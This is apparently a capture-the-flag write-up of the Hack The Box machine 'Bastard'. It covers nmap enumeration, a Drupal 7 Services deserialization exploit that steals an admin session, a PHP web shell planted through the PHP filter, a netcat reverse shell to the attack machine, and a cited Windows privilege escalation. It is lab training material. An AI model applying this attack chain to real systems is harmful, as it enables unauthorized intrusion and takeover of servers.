Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.9 All
All: Runs all the scans consecutively.
We get back the following result.
Running all scans on 10.10.10.9Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 6.84 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:56 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.32 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 10:57 EST
Nmap scan report for 10.10.10.9
Host is up.
All 1000 scanned ports on 10.10.10.9 are open|filteredNmap done: 1 IP address (1 host up) scanned in 202.50 seconds---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:01 EST
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.02s elapsed
Initiating SYN Stealth Scan at 11:01
Scanning 10.10.10.9 [65535 ports]
....
Nmap scan report for 10.10.10.9
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 264.79 seconds
Raw packets sent: 131270 (5.776MB) | Rcvd: 274 (17.620KB)No new ports---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 11:05 EST
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.13 seconds
Note: The gobuster, nikto and droopescan scans kept timing out. The web server seems to be not able to handle the requests that these tools were sending.
We have three open ports.
Port 80: running Drupal 7
Port 135 & 49154: running Microsoft Windows RPC
Before we move on to enumeration, let’s make some mental notes about the scan results.
Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. Most of these exploits are associated with the modules that are installed on Drupal. Since droopescan is not working, we’ll have to manually figure out if these modules are installed.
Enumeration
Visit the web application in the browser.
It’s running Drupal which is is a free and open-source content management framework. Let’s look at the CHANGELOG to view the exact version.
It’s running Drupal 7.54.
Let’s try and find credentials to this application. I googled “default credentials drupal”, but I didn’t find anything useful. Next, I tried common credentials admin/admin, admin/password, etc. but was not able to log in.
When it is an off-the-shelf software, I usually don’t run a brute force attack on it because it probably has a lock out policy in place.
Next, run searchsploit.
searchsploit drupal 7
Let’s view vulnerability number 41564.
searchsploit -m 41564
It links to this blog post. It seems to be a deserialization vulnerability that leads to Remote Code Execution (RCE). Looking at the code, it we see that it visit the path /rest_endpoint to conduct the exploit.
There are also two comments that are not wrapped properly that you’ll need to fix.
Run the exploit.
php 41564.php
We get an “ Uncaught Error: Call to undefined function curl_init()” error message. That’s because we don’t have php-curl installed on our kali machine.
apt-get install php-curl
Now the exploit should work.
root@kali:~/Desktop/htb/bastard# php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/dixuSOspsOUU.php
Perfect! It created two files: session.json and user.json. View the content of user.json.
It gives us the hashed password of the admin user. We could run it through a password cracker, however, we don’t need to because the session.json file gives us a valid session cookie for the admin user.
Let’s add the cookie to our browser using the Cookie Manager plugin.
Then refresh the page.
We’re logged in as admin! Click on the Modules tab and check if the PHP filter is enabled. It is. This means we can add PHP code.
Click on Add new content on the welcome page > click on Basic page. In the Title field add the value “shell”. In the Body field add the simple PHP shell to upload/execute code from the following link. Make sure to include the “<?php ?>” tags and change it to the IP address of your attack machine. This gives us the ability to both execute and upload files. In the Text format filed choose the option PHP code. Then hit Save.
In my case the entry created is under the path /node/4. Let’s test it out.
We have code execution! I can’t seem to use powershell from here, so what we’ll do is upload netcat on the box and then use it to send a reverse shell back to our attack machine.
Run the systeminfo command.
It’s a 64-bit operating system. Download the 64-bit executable of netcat from here. Start up a python server.
python -m SimpleHTTPServer 7777
Upload it using the fupload parameter.
Then set up a listener on the attack machine.
nc -nlvp 1234
Use the uploaded netcat executable to send a reverse shell to our attack machine.
We get a shell!
root@kali:~# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.9] 60572
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
Grab the user.txt flag.
Now we need to escalate privileges.
Privilege Escalation
We know from the output of the systeminfo command the OS name and version.
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
The Arctic box was running the same OS, so I used the same exploit MS10–059 to escalate privileges for this box. I won’t explain it here, please refer to the the Arctic writeup.
Grab the root.txt flag.
Lessons Learned
What allowed me to gain initial access to the machine and escalate privileges, is exploiting known vulnerabilities that had patches available. So it goes without saying, you should always update your software!